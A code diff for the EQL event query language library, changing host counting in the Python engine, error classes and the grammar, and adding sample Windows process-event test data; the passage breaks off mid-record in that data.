host_key = self.host_key get_unique_key = self._convert_key(node.arguments, scoped=True, piped=True) results = OrderedDict() @@ -727,50 +653,78 @@ def count_unique_callback(events): # type: (list[Event]) -> None total = sum(result[0].data['count'] for result in results.values()) for result in results.values(): + hosts = result[0].data.pop('hosts') # type: set + if len(hosts) > 0: + result[0].data['hosts'] = list(sorted(hosts)) + result[0].data['total_hosts'] = len(hosts) + result[0].data['percent'] = float(result[0].data['count']) / total next_pipe(result) - results.clear() next_pipe(PIPE_EOF) + # reset state + results.clear() else: # Create a copy of these, because they can be modified events = [events[0].copy()] + events[1:] piece = events[0].data key = get_unique_key(events) + hosts = piece.pop('hosts', []) + host = piece.pop(host_key, None) count = piece.pop('count', 1) if key not in results: results[key] = events match = piece + match['hosts'] = set() match['count'] = count else: match = results[key][0].data match['count'] += count + if host: + match['hosts'].add(host) + else: + match['hosts'].update(hosts) + return count_unique_callback - @reducers.add(CountPipe) - def _aggregate_counts(self, node, next_pipe): # type: (CountPipe) -> callable + def _reduce_count_pipe(self, node, next_pipe): # type: (CountPipe) -> callable """Aggregate counts coming into the pipe.""" + host_key = self.host_key if len(node.arguments) == 0: # Counting only the total - result = {'count': 0} + result = {'key': 'totals', 'count': 0, 'hosts': set()} def count_total_aggregates(events): # type: (list[Event]) -> None if events is PIPE_EOF: - # event must be immutable, as the counter will be reset - event = {'key': 'totals', 'count': result['count']} + hosts = result.pop('hosts') # type: set + + # immutable version of result + event = result.copy() + if len(hosts) > 0: + event['hosts'] = list(sorted(hosts)) + event['total_hosts'] = len(hosts) + next_pipe([Event(EVENT_TYPE_GENERIC, 0, event)]) - result['count'] = 0 next_pipe(PIPE_EOF) + + # reset state + result['count'] = 0 + result['hosts'] = set() else: piece = events[0].data result['count'] += piece['count'] + if host_key in piece: + result['hosts'].add(piece[host_key]) + elif 'hosts' in piece: + results['hosts'].update(piece['hosts']) + return count_total_aggregates else: - results = defaultdict(lambda: {'count': 0}) + results = defaultdict(lambda: {'count': 0, 'hosts': set()}) def count_tuple_callback(events): # type: (list[Event]) -> None if events is PIPE_EOF: @@ -780,21 +734,30 @@ def count_tuple_callback(events): # type: (list[Event]) -> None total = sum(result['count'] for result in converted_results.values()) for key, result in sorted(converted_results.items(), key=lambda kr: (kr[1]['count'], kr[0])): + hosts = result.pop('hosts') # type: set + if len(hosts) > 0: + result['hosts'] = list(sorted(hosts)) + result['total_hosts'] = len(hosts) result['key'] = key result['percent'] = float(result['count']) / total next_pipe([Event(EVENT_TYPE_GENERIC, 0, result)]) - results.clear() next_pipe(PIPE_EOF) + + # reset state + results.clear() else: piece = events[0].data key = events[0].data['key'] key = tuple(key) if len(node.arguments) > 1 else key results[key]['count'] += piece['count'] + if host_key in piece: + results[key]['hosts'].add(piece[host_key]) + elif 'hosts' in piece: + results[key]['hosts'].update(piece['hosts']) return count_tuple_callback - @converters.add(NamedSubquery) - def _get_named_of(self, node): # type: (NamedSubquery) -> callable + def _convert_named_subquery(self, node): # type: (NamedSubquery) -> callable if node.query_type == NamedSubquery.DESCENDANT: return self._get_descendant_of(node.query) elif node.query_type == NamedSubquery.CHILD: @@ -826,7 +789,7 @@ def update_descendants(event): # type: (Event) -> None dead_processes.clear() - if subtype in creates and event.data.get('pid') == 4 and event.data.get('process_name') == "System": + if subtype in creates and pid == 4 and event.data.get('process_name') == "System": # Reset all state on a sensor or machine boot up descendants.clear() sources.clear() @@ -842,8 +805,9 @@ def update_descendants(event): # type: (Event) -> None @self.event_callback(node.event_type) def check_ancestor(event): # type: (Event) -> None pid = event.data.get('pid', 0) - if pid != 0 and ancestor_match(event): - sources.add(event.data.get(self.pid_key)) + pid_key = event.data.get(self.pid_key) + if pid != 0 and ancestor_match(event) and pid_key: + sources.add(pid_key) def check_if_descendant(scope): # type: (Scope) -> bool return scope.event.data.get(self.pid_key) in descendants @@ -872,7 +836,7 @@ def update_children(event): # type: (Event) -> None dead_processes.clear() - if subtype in creates and event.data.get('pid') == 4 and event.data.get('process_name') == "System": + if subtype in creates and pid == 4 and event.data.get('process_name') == "System": # Reset all state on a sensor or machine boot up children.clear() parents.clear() @@ -888,10 +852,11 @@ def update_children(event): # type: (Event) -> None @self.event_callback(node.event_type) def match_processes(event): # type: (Event) -> None pid = event.data.get('pid', 0) - if pid != 0 and process_match(event): - parents.add(event.data.get(self.pid_key)) + pid_key = event.data.get(self.pid_key) + if pid != 0 and process_match(event) and pid_key: + parents.add(pid_key) - def check_if_child(scope): # type: (Scope) -> None + def check_if_child(scope): # type: (Scope) -> bool return scope.event.data.get(self.pid_key) in children return check_if_child @@ -914,7 +879,7 @@ def purge_on_terminate(event): # type: (Event) -> None dead_processes.clear() - if subtype in creates and event.data.get('pid') == 4 and event.data.get('process_name') == "System": + if subtype in creates and pid == 4 and event.data.get('process_name') == "System": # Reset all state on a sensor or machine boot up processes.clear() @@ -926,15 +891,15 @@ def purge_on_terminate(event): # type: (Event) -> None @self.event_callback(node.event_type) def match_processes(event): # type: (Event) -> None pid = event.data.get('pid', 0) - if pid != 0 and process_match(event): - processes.add(event.data.get(self.pid_id)) + pid_key = event.data.get(self.pid_key) + if pid != 0 and process_match(event) and pid_key: + processes.add(pid_key) - def check_for_match(scope): # type: (Scope) -> None + def check_for_match(scope): # type: (Scope) -> bool return scope.event.data.get(self.pid_key) in processes return check_for_match - @converters.add(EventQuery) def _convert_event_query(self, node): # type: (EventQuery) -> callable check_match = self.convert(node.query, scoped=True) expected_type = node.event_type @@ -947,7 +912,6 @@ def match_event_callback(event): # type: (Event) -> bool else: return match_event_callback - @converters.add(Join) def _convert_join(self, node, next_pipe): # type: (Join, callable) -> callable size = len(node.queries) lookup = defaultdict(lambda: [None] * size) # type: dict[object, list[Event]] @@ -1022,11 +986,9 @@ def finish_sequence(event): # type: (Event) -> None sequence.append(event) next_pipe(sequence) - @converters.add(TimeRange) - def _convert_range(self, node): - return int(node.delta.total_seconds() * self._time_unit) + def _convert_time_range(self, node): + return int(node.delta.total_seconds() * self.time_unit) - @converters.add(Sequence) def _convert_sequence(self, node, next_pipe): # type: (Sequence, callable) -> callable # Two lookups can help avoid unnecessary calls size = len(node.queries) @@ -1108,7 +1070,6 @@ def sort_results(events): # type: (list[Event]) -> None self._query_multiple_events = prev_query_value return output_pipe - @converters.add(PipedQuery) def _convert_piped_query(self, node, output_pipe=None): # type: (PipedQuery, callable) -> callable base_query = node.first @@ -1166,7 +1127,7 @@ def add_post_processor(self, query, analytic_id=None, output_pipe=None, query_mu def add_reducer(self, query, analytic_id=None, output_pipe=None): """Reduce the output from multiple queries. - :param PipedQuery|EqlAnalytic query: The analytic to extra the reuce logic from + :param PipedQuery|EqlAnalytic query: The analytic to extra the reduce logic from :param str analytic_id: Optional analytic_id to add to AnalyticOutput results :param callable output_pipe: Next pipe to reduce to """ diff --git a/eql/engines/__init__.py b/eql/engines/__init__.py deleted file mode 100644 index 19c783b..0000000 --- a/eql/engines/__init__.py +++ /dev/null @@ -1,11 +0,0 @@ -"""Base analytic engine code and renderers.""" -from .base import Event, AnalyticOutput, TextEngine, BaseTranspiler -from .native import PythonEngine - -__all__ = ( - "Event", - "AnalyticOutput", - "TextEngine", - "PythonEngine", - "BaseTranspiler", -) diff --git a/eql/errors.py b/eql/errors.py index c8fdf53..48f6f47 100644 --- a/eql/errors.py +++ b/eql/errors.py @@ -4,8 +4,12 @@ __all__ = ( "EqlError", - "ParseError", - "SchemaError" + "EqlParseError", + "EqlCompileError", + "EqlSchemaError", + "EqlSyntaxError", + "EqlSemanticError", + "EqlTypeMismatchError", ) @@ -13,22 +17,42 @@ class EqlError(Exception): """Base class for EQL errors.""" -class ParseError(EqlError): +class EqlCompileError(EqlError): + """Base exception class for compiling EQL to other languages.""" + + +class EqlParseError(EqlError): """EQL Parsing Error.""" - template = "Error at ({}:{}) {}:\n{}\n{}^" + template = u"Error at line:{},column:{}\n{}\n{}\n{}" - def __init__(self, error_msg, line, column, source): + def __init__(self, error_msg, line, column, source, width=1, trailer=None): """Create error.""" self.error_msg = error_msg self.line = line self.column = column self.source = source + self.trailer = trailer leading = re.sub(r'[^\t]', ' ', source)[:column] - message = self.template.format(line + 1, column + 1, error_msg, source, leading) - self.message = message - super(ParseError, self).__init__(message) + self.caret = leading + ("^" * width) + message = self.template.format(line + 1, column + 1, error_msg, source, self.caret) + if trailer: + message += "\n" + trailer + + super(EqlParseError, self).__init__(message) + + +class EqlSyntaxError(EqlParseError): + """Error with EQL syntax.""" + + +class EqlSemanticError(EqlParseError): + """Error with EQL semantics.""" + + +class EqlSchemaError(EqlSemanticError): + """Error for missing fields.""" -class SchemaError(ParseError): - """Error for unknown event types.""" +class EqlTypeMismatchError(EqlSemanticError): + """Error when validating types.""" diff --git a/eql/etc/eql.ebnf b/eql/etc/eql.ebnf index bd67142..40734a2 100644 --- a/eql/etc/eql.ebnf +++ b/eql/etc/eql.ebnf @@ -6,6 +6,9 @@ start = single_query; +cli_query = @:piped_query [';'] $; + + piped_query::PipedQuery = | query:base_query pipes:[pipe_chain] @@ -66,13 +69,13 @@ by_values event_query::EventQuery = - [event_type:ident 'where' ~ ] cond:expression + [event_type:ident 'where' ~ ] cond:root_expression ; macro::Macro = - 'macro' ~ name:ident '(' params:params')' body:expression + 'macro' ~ name:ident '(' params:params')' body:root_expression ; const::Constant @@ -93,20 +96,29 @@ definition definitions = {definition} $; single_definition = definition $; single_query = piped_query $; -single_expression = expression $; +single_expression = root_expression $; +single_atom = atom $; +root_expression::RootExpression + = expr:expression + ; + expression = | or_expr | subexpression ; +# Add check for missing parenthesis +check_paren::CheckParentheses + = + '(' ~ expr:expression ')' + ; or_expr::OrTerms = terms+:subexpression {'or' ~ terms+:subexpression}+; - subexpression = | and_expr @@ -144,7 +156,7 @@ in_set::InSet # Operators equals::Equals = '==' | '='; -comparator = @:('<=' | '<' | equals | '!=' | '>=' | '>'); +comparator::Comparator = comp:('<=' | '<' | equals | '!=' | '>=' | '>'); value @@ -152,6 +164,7 @@ value | function_call | named_subquery | check_paren + | atom ; function_call::FunctionCall @@ -159,15 +172,10 @@ function_call::FunctionCall name:ident '(' ~ args:[expressions] ')' ; -check_paren - = - | '(' ~ @:expression ')' - | atom - ; - atom = + | time_unit | literal | field ; @@ -181,19 +189,26 @@ expressions argument = expression; +subquery_type::SubqueryType + = name:ident 'of' ~; + named_subquery::NamedQuery - = name:ident 'of' ~ query:subquery; + = stype:subquery_type query:subquery; field::Field = - base:ident sub_fields:{sub_field} + base:ident sub_fields:{attribute | array_index} + ; + +attribute::Attribute + = '.' attr:ident ; -sub_field + +array_index::ArrayIndex = - | '.' @:ident - | '[' @:unsigned_integer ']' + '[' value:unsigned_integer ']' ; diff --git a/eql/etc/schema.json b/eql/etc/schema.json deleted file mode 100644 index d5e3b97..0000000 --- a/eql/etc/schema.json +++ /dev/null @@ -1,11 +0,0 @@ -{ - "event_types": [ - "dns", - "file", - "network", - "process", - "registry", - "security", - "image_load" - ] -} \ No newline at end of file diff --git a/eql/etc/test_data.json b/eql/etc/test_data.json new file mode 100644 index 0000000..90fab7e --- /dev/null +++ b/eql/etc/test_data.json @@ -0,0 +1,2080 @@ +[ + { + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "opcode": 3, + "pid": 0, + "process_name": "System Idle Process", + "serial_event_id": 1, + "subtype": "create", + "timestamp": 116444736000000000, + "unique_pid": 1 + }, + { + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "opcode": 3, + "parent_process_name": "System Idle Process", + "pid": 4, + "process_name": "System", + "serial_event_id": 2, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 2, + "unique_ppid": 1, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "\\SystemRoot\\System32\\smss.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "63d3c30b497347495b8ea78a38188969", + "opcode": 3, + "parent_process_name": "System", + "pid": 284, + "ppid": 4, + "process_name": "smss.exe", + "process_path": "C:\\Windows\\System32\\smss.exe", + "serial_event_id": 3, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 3, + "unique_ppid": 2, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "60c2862b4bf0fd9f582ef344c2b1ec72", + "opcode": 3, + "pid": 372, + "ppid": 364, + "process_name": "csrss.exe", + "process_path": "C:\\Windows\\System32\\csrss.exe", + "serial_event_id": 4, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 4, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "wininit.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "94355c28c1970635a31b3fe52eb7ceba", + "opcode": 3, + "pid": 424, + "ppid": 364, + "process_name": "wininit.exe", + "process_path": "C:\\Windows\\System32\\wininit.exe", + "serial_event_id": 5, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 5, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "60c2862b4bf0fd9f582ef344c2b1ec72", + "opcode": 3, + "pid": 436, + "ppid": 416, + "process_name": "csrss.exe", + "process_path": "C:\\Windows\\System32\\csrss.exe", + "serial_event_id": 6, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 6, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "winlogon.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "1151b1baa6f350b1db6598e0fea7c457", + "opcode": 3, + "pid": 472, + "ppid": 416, + "process_name": "winlogon.exe", + "process_path": "C:\\Windows\\System32\\winlogon.exe", + "serial_event_id": 7, + "subtype": "create", + "timestamp": 131485996510000000, + "unique_pid": 7, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\services.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "24acb7e5be595468e3b9aa488b9b4fcb", + "opcode": 3, + "parent_process_name": "wininit.exe", + "parent_process_path": "C:\\Windows\\System32\\wininit.exe", + "pid": 524, + "ppid": 424, + "process_name": "services.exe", + "process_path": "C:\\Windows\\System32\\services.exe", + "serial_event_id": 8, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 8, + "unique_ppid": 5, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\lsass.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "7554a1b82b4a222fd4cc292abd38a558", + "opcode": 3, + "parent_process_name": "wininit.exe", + "parent_process_path": "C:\\Windows\\System32\\wininit.exe", + "pid": 536, + "ppid": 424, + "process_name": "lsass.exe", + "process_path": "C:\\Windows\\System32\\lsass.exe", + "serial_event_id": 9, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 9, + "unique_ppid": 5, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\lsm.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "9662ee182644511439f1c53745dc1c88", + "opcode": 3, + "parent_process_name": "wininit.exe", + "parent_process_path": "C:\\Windows\\System32\\wininit.exe", + "pid": 544, + "ppid": 424, + "process_name": "lsm.exe", + "process_path": "C:\\Windows\\System32\\lsm.exe", + "serial_event_id": 10, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 10, + "unique_ppid": 5, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k DcomLaunch", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 648, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 11, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 11, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "\"C:\\Program Files\\VMware\\VMware Tools\\vmacthlp.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "3c4d41c4f8cdd2ca945e91a61e6cfbaf", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 708, + "ppid": 524, + "process_name": "vmacthlp.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmacthlp.exe", + "serial_event_id": 12, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 12, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k RPCSS", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 752, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 13, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 13, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "\"LogonUI.exe\" /flags:0x0", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "715f03b4c7223349768013ea95d9e5b7", + "opcode": 3, + "parent_process_name": "winlogon.exe", + "parent_process_path": "C:\\Windows\\System32\\winlogon.exe", + "pid": 828, + "ppid": 472, + "process_name": "LogonUI.exe", + "process_path": "C:\\Windows\\System32\\LogonUI.exe", + "serial_event_id": 14, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 14, + "unique_ppid": 7, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 848, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 15, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 15, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "command_line": "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 896, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 16, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 16, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k netsvcs", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 924, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 17, + "subtype": "create", + "timestamp": 131485996520000000, + "unique_pid": 17, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k LocalService", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 264, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 18, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 18, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k NetworkService", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 968, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 19, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 19, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "C:\\Windows\\System32\\spoolsv.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "b96c17b5dc1424d56eea3a99e97428cd", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1108, + "ppid": 524, + "process_name": "spoolsv.exe", + "process_path": "C:\\Windows\\System32\\spoolsv.exe", + "serial_event_id": 20, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 20, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1136, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 21, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 21, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "LOCAL SERVICE" + }, + { + "command_line": "\"C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VGAuthService.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "ccd745aa6425c7637a34ff12ed8a1c18", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1320, + "ppid": 524, + "process_name": "VGAuthService.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VGAuthService.exe", + "serial_event_id": 22, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 22, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "404202d6f0628331aaade8c8f9ef6feb", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1344, + "ppid": 524, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "serial_event_id": 23, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 23, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "\"C:\\Program Files\\VMware\\VMware Tools\\VMware CAF\\pme\\bin\\ManagementAgentHost.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "3f61b1a4fe078bb7705b508cfcbb987e", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1376, + "ppid": 524, + "process_name": "ManagementAgentHost.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\VMware CAF\\pme\\bin\\ManagementAgentHost.exe", + "serial_event_id": 24, + "subtype": "create", + "timestamp": 131485996530000000, + "unique_pid": 24, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "c78655bc80301d76ed4fef1c1ea40a7d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1692, + "ppid": 524, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "serial_event_id": 25, + "subtype": "create", + "timestamp": 131485996540000000, + "unique_pid": 25, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "C:\\Windows\\system32\\wbem\\wmiprvse.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "8f4ecbbfe943030acfd9e892b2513ec1", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 1840, + "ppid": 648, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "serial_event_id": 26, + "subtype": "create", + "timestamp": 131485996540000000, + "unique_pid": 26, + "unique_ppid": 11, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "C:\\Windows\\System32\\msdtc.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "de0ece52236cfa3ed2dbfc03f28253a8", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 960, + "ppid": 524, + "process_name": "msdtc.exe", + "process_path": "C:\\Windows\\System32\\msdtc.exe", + "serial_event_id": 27, + "subtype": "create", + "timestamp": 131485996550000000, + "unique_pid": 27, + "unique_ppid": 8, + "user_domain": "NT AUTHORITY", + "user_name": "NETWORK SERVICE" + }, + { + "command_line": "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "60c2862b4bf0fd9f582ef344c2b1ec72", + "opcode": 3, + "pid": 3048, + "ppid": 3040, + "process_name": "csrss.exe", + "process_path": "C:\\Windows\\System32\\csrss.exe", + "serial_event_id": 28, + "subtype": "create", + "timestamp": 131485996790000000, + "unique_pid": 28, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "winlogon.exe", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "1151b1baa6f350b1db6598e0fea7c457", + "opcode": 3, + "pid": 2108, + "ppid": 3040, + "process_name": "winlogon.exe", + "process_path": "C:\\Windows\\System32\\winlogon.exe", + "serial_event_id": 29, + "subtype": "create", + "timestamp": 131485996790000000, + "unique_pid": 29, + "unique_ppid": 0, + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "command_line": "rdpclip", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "25d284eb2f12254c001afe9a82575a81", + "opcode": 3, + "parent_process_name": "svchost.exe", + "parent_process_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 2704, + "ppid": 968, + "process_name": "rdpclip.exe", + "process_path": "C:\\Windows\\System32\\rdpclip.exe", + "serial_event_id": 30, + "subtype": "create", + "timestamp": 131485996810000000, + "unique_pid": 30, + "unique_ppid": 19, + "user_domain": "vagrant", + "user_name": "vagrant" + }, + { + "command_line": "\"taskhost.exe\"", + "event_subtype_full": "already_running", + "event_type": "process", + "event_type_full": "process_event", + "md5": "517110bd83835338c037269e603db55d", + "opcode": 3, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 2776, + "ppid": 524, + "process_name": "taskhost.exe", + "process_path": "C:\\Windows\\System32\\taskhost.exe", + "serial_event_id": 31, + "subtype": "create", + "timestamp": 